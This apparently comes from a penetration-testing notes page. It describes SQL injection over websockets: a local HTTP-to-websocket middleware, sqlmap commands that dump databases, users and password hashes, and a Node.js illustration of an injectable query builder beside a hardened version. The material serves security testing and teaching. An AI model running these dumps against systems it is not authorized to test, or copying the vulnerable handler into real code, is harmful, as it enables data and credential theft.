# Websocket SQLi

* SQLmap is not able to send websocket requests directly because of the id that is added to the request. Therefore you need a local webserver as a middleware which translates the requests to the target. Put the webserver URL and the correct data structure into the script and run it.

```sh
sqlmap -u "http://127.0.0.1:8081/?id=62009" -p "id" --dbs
```

## Usage

First, make sure `websocket-client` is installed from PyPI.

Enumerate the websocket via [the websocket enumeration script](../../Enumeration/EnumScripts).

You may provide the URL endpoint you want to request and the key and value of the request via the arguments in the following way:

```sh
websocket_enumeration.py /values key value
```

I modified the script rayhan0x01 provides so that an endpoint can be set. [The modified script](./Scripts/sqlmap_websocket_server.py) is started in the following way:

```sh
sqlmap_websocket_server.py /endpoint
```

Start sqlmap requesting the `sqlmap_websocket_server` on localhost port 8081:

```sh
sqlmap -u "http://127.0.0.1:8081/?id=1" --batch --risk 3 --level 5 --flush-session --dump --passwords --users
```

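For the other side of the picture, here is an added example (not code from this page or from rayhan0x01's repository) of the kind of Node.js websocket handler this setup tests, in its injectable form beside a hardened one. The message shape `{"id": "..."}`, the `users` table and the placeholder syntax are assumptions.

```javascript
// Added illustration: how a Node.js websocket handler becomes SQL-injectable
// through the JSON field that the HTTP-to-websocket middleware forwards, and
// how to close the hole. Message shape {"id": "..."} and the users table are
// assumed; a real handler would pass the result to a DB driver such as pg.

// Vulnerable: the value taken from the websocket frame is spliced into the SQL
// text, so any payload forwarded from the ?id= parameter rewrites the query.
function buildQueryVulnerable(rawMessage) {
  const msg = JSON.parse(rawMessage);
  return `SELECT id, name FROM users WHERE id = ${msg.id}`;
}

// Hardened: validate the field against the type the application expects and
// keep the value out of the SQL text ($1 is node-postgres placeholder syntax;
// mysql2 would use ? instead).
function buildQuerySafe(rawMessage) {
  let msg;
  try {
    msg = JSON.parse(rawMessage);
  } catch (e) {
    throw new Error('malformed message');
  }
  if (typeof msg.id !== 'string' && typeof msg.id !== 'number') {
    throw new Error('missing id');
  }
  // Only a plain decimal integer is acceptable for a numeric id; quotes,
  // spaces and SQL keywords are rejected before any query is built.
  const idText = String(msg.id);
  if (!/^[0-9]{1,10}$/.test(idText)) {
    throw new Error('id must be a positive integer');
  }
  return { text: 'SELECT id, name FROM users WHERE id = $1', values: [Number(idText)] };
}

// Server-side triage that is also worth logging: a frame that fails validation
// is a strong signal of tampering on a field that should only ever hold a number.
function classifyFrame(rawMessage) {
  try {
    buildQuerySafe(rawMessage);
    return 'ok';
  } catch (e) {
    return 'rejected: ' + e.message;
  }
}
```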
## References

* [rayhan0x01's git repo](https://github.com/rayhan0x01/nodejs-websocket-sqli)
* [rayhan0x01's blog entry](https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html)